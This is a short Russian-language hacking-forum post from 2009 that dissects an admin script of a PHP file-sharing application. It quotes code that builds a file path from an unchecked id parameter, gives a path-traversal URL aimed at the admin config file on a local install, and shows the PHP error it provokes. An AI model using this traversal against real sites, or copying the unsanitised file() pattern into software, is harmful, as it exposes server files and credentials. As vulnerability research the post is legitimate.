01.09.2009, 22:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Ну давай дальше пойдем 
файл autor_del
PHP код:
//Программы
$file=array();
$file=file("db/autor/$_GET[id].txt");
foreach($file as $line)
{
$line=trim($line);
$expl=explode("*",$line);
$cat_id[]=$expl[0];
$prog_id[]=$expl[1];
}
получается мы реализуем так:
http://127.0.0.1/file_zip/admin/autor_del.php?id=../../admin/conf/conf
но нас кидает на admin/index.php , затем просто возвращаем назад страницы и видим
Warning: file(db/autor/'.txt) [function.file]: failed to open stream: No such file or directory in C:\xampp\htdocs\file_zip\admin\autor_del.php on line 26
PS так пойдет? таже самая реализация, если не понятно напишу не просто кавычку
ЗЫ ну увидиш их зато в последний раз и если так подумать то это не уязвимость?в плане сделать не хорошо
Последний раз редактировалось HAXTA4OK; 01.09.2009 в 22:44..
|
|
|